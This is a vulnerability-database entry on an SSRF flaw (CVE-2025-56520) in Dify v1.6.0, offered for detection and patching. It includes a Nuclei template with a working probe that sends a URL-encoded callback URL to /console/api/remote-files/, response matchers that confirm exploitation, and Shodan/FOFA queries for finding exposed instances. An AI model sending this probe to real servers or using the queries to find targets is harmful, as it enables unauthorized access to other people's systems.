cbcvebase.
CVE-2025-56520
published 2025-09-30

CVE-2025-56520: Dify v1.6.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component controllers.console.remote_files.RemoteFileUploadApi. A different…

PriorityP278medium5.3CVSS 3.1
AVNACLPRNUINSUCLINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
0.65%
46.5th percentile
Dify v1.6.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component controllers.console.remote_files.RemoteFileUploadApi. A different vulnerability than CVE-2025-29720.

Affected

1 ranges
VendorProductVersion rangeFixed in
difydify

Detection & IOCsextracted from sources · hover to see the quote

urlGET /console/api/remote-files/http%3A%2F%2F{{interactsh-url}}%2Ftest HTTP/1.1
path/console/api/remote-files/
sigma
id: CVE-2025-56520
info:
  name: Dify v1.6.0 - Server-Side Request Forgery
  author: 0x_Akoko
  severity: high
  description: |
    Dify v1.6.0 contains a server side request forgery caused by improper validation in controllers.console.remote_files.RemoteFileUploadApi, letting attackers make arbitrary requests from the server, exploit requires network access.
http:
- raw:
  - |
    GET /console/api/remote-files/http%3A%2F%2F{{interactsh-url}}%2Ftest HTTP/1.1
    Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
  part: body
  words:
  - "file_type"
  - "file_length"
  condition: and
- type: word
  part: content_type
  words:
  - "application/json"
- type: word
  part: interactsh_protocol
  words:
  - "http"
  - "dns"
  condition: or
- type: status
  status:
  - 200
  • SSRF is triggered via the RemoteFileUploadApi endpoint by passing a URL-encoded external URL as a path parameter to /console/api/remote-files/. Monitor for outbound HTTP/DNS requests originating from the Dify server process following requests to this path.
  • A successful SSRF probe returns HTTP 200 with a JSON body containing both 'file_type' and 'file_length' fields and Content-Type: application/json. Use these response characteristics to confirm exploitation.
  • Out-of-band detection: monitor for unexpected HTTP or DNS callbacks from the Dify server host to external/internal infrastructure after requests to /console/api/remote-files/ with a URL-encoded value in the path.
  • Use Shodan query 'http.title:"Dify"' or FOFA query 'title="Dify"' to identify internet-exposed Dify instances that may be targeted.
  • ·The NVD entry scores this CVE as MEDIUM (5.3), while the Nuclei template author rates it HIGH (9.3, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N). Defenders should note the discrepancy and assess based on their network exposure.
  • ·This is explicitly noted as a different vulnerability from CVE-2025-29720, which also affects Dify's remote file upload functionality. Ensure both CVEs are patched independently.

CVSS provenance

nvdv3.15.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
vulncheck4.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.